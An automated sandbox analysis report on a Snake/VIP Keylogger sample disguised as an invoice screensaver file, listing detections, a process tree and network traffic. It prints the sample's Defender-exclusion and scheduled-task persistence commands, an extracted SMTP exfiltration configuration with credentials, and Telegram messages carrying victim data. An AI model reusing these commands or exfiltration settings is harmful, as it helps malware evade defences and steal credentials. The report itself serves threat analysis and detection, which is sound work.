Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INV000001203.scr

Overview

General Information

Sample name:INV000001203.scr
Analysis ID:1638255
MD5:0277055ac25e620d71b564f5f8c8b1fe
SHA1:f36a6ebb05f2e3f3e1e23c05c500d810d975ddac
SHA256:dc43486add14d47443958f97ba68a1d3b2da6abc8f60d4e6343699441a783ee3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • INV000001203.scr (PID: 3236 cmdline: "C:\Users\user\Desktop\INV000001203.scr" /S MD5: 0277055AC25E620D71B564F5F8C8B1FE)
    • powershell.exe (PID: 3336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3356 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • RegSvcs.exe (PID: 3504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • taskeng.exe (PID: 3496 cmdline: taskeng.exe {EDC565F7-D229-4A04-9F45-CF04A45A0510} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • bZqCbFmlynN.exe (PID: 3536 cmdline: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe MD5: 0277055AC25E620D71B564F5F8C8B1FE)
      • powershell.exe (PID: 3656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3688 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 3836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "serverche399@gpsamsterdamqroup.com", "Password": "     j4YX(KT7UCZ1      ", "Host": "fiber13.dnsiaas.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "serverche399@gpsamsterdamqroup.com", "Password": "     j4YX(KT7UCZ1      ", "Host": "fiber13.dnsiaas.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.378936935.0000000003851000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2dd8a:$a1: get_encryptedPassword
        • 0x2e0a3:$a2: get_encryptedUsername
        • 0x2dba8:$a3: get_timePasswordChanged
        • 0x2dca3:$a4: get_passwordField
        • 0x2dda0:$a5: set_encryptedPassword
        • 0x2f3fa:$a7: get_logins
        • 0x2f35d:$a10: KeyLoggerEventArgs
        • 0x2efc2:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 17 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INV000001203.scr" /S, ParentImage: C:\Users\user\Desktop\INV000001203.scr, ParentProcessId: 3236, ParentProcessName: INV000001203.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", ProcessId: 3336, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INV000001203.scr" /S, ParentImage: C:\Users\user\Desktop\INV000001203.scr, ParentProcessId: 3236, ParentProcessName: INV000001203.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", ProcessId: 3336, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe, ParentImage: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe, ParentProcessId: 3536, ParentProcessName: bZqCbFmlynN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp", ProcessId: 3688, ProcessName: schtasks.exe
          Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
          Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INV000001203.scr" /S, ParentImage: C:\Users\user\Desktop\INV000001203.scr, ParentProcessId: 3236, ParentProcessName: INV000001203.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", ProcessId: 3356, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INV000001203.scr" /S, ParentImage: C:\Users\user\Desktop\INV000001203.scr, ParentProcessId: 3236, ParentProcessName: INV000001203.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe", ProcessId: 3336, ProcessName: powershell.exe
          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3336, TargetFilename: C:\Users\user\AppData\Local\Temp\wnymxqxe.pfn.ps1

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INV000001203.scr" /S, ParentImage: C:\Users\user\Desktop\INV000001203.scr, ParentProcessId: 3236, ParentProcessName: INV000001203.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp", ProcessId: 3356, ProcessName: schtasks.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-14T10:19:18.793841+010028033053Unknown Traffic192.168.2.2249166104.21.48.1443TCP
          2025-03-14T10:19:23.307786+010028033053Unknown Traffic192.168.2.2249172104.21.112.1443TCP
          2025-03-14T10:19:25.185448+010028033053Unknown Traffic192.168.2.2249175104.21.112.1443TCP
          2025-03-14T10:19:30.374859+010028033053Unknown Traffic192.168.2.2249181104.21.16.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-14T10:19:15.826133+010028032742Potentially Bad Traffic192.168.2.2249164132.226.247.7380TCP
          2025-03-14T10:19:18.374249+010028032742Potentially Bad Traffic192.168.2.2249164132.226.247.7380TCP
          2025-03-14T10:19:18.877192+010028032742Potentially Bad Traffic192.168.2.2249168132.226.247.7380TCP
          2025-03-14T10:19:21.770401+010028032742Potentially Bad Traffic192.168.2.2249170132.226.8.16980TCP
          2025-03-14T10:19:22.906318+010028032742Potentially Bad Traffic192.168.2.2249170132.226.8.16980TCP
          2025-03-14T10:19:24.782314+010028032742Potentially Bad Traffic192.168.2.2249173132.226.247.7380TCP
          2025-03-14T10:19:27.389522+010028032742Potentially Bad Traffic192.168.2.2249174158.101.44.24280TCP
          2025-03-14T10:19:28.855976+010028032742Potentially Bad Traffic192.168.2.2249178132.226.8.16980TCP
          2025-03-14T10:19:29.682314+010028032742Potentially Bad Traffic192.168.2.2249176158.101.44.24280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-14T10:19:39.234574+010018100071Potentially Bad Traffic192.168.2.2249193149.154.167.220443TCP
          2025-03-14T10:19:41.497789+010018100071Potentially Bad Traffic192.168.2.2249197149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "serverche399@gpsamsterdamqroup.com", "Password": " j4YX(KT7UCZ1 ", "Host": "fiber13.dnsiaas.com", "Port": "587"}
          Source: 00000000.00000002.378936935.00000000040C3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "serverche399@gpsamsterdamqroup.com", "Password": " j4YX(KT7UCZ1 ", "Host": "fiber13.dnsiaas.com", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeVirustotal: Detection: 39%Perma Link
          Multi AV Scanner detection for submitted file
          Source: INV000001203.scrReversingLabs: Detection: 34%
          Source: INV000001203.scrVirustotal: Detection: 39%Perma Link
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: INV000001203.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.22:49165 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49171 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49193 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49197 version: TLS 1.2
          Source: INV000001203.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.22:49193 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.22:49197 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%203/15/2025%20/%204:20:21%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%203/15/2025%20/%2012:30:26%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49178 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49168 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49176 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49173 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49174 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49170 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 104.21.112.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 104.21.48.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49175 -> 104.21.112.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49181 -> 104.21.16.1:443
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
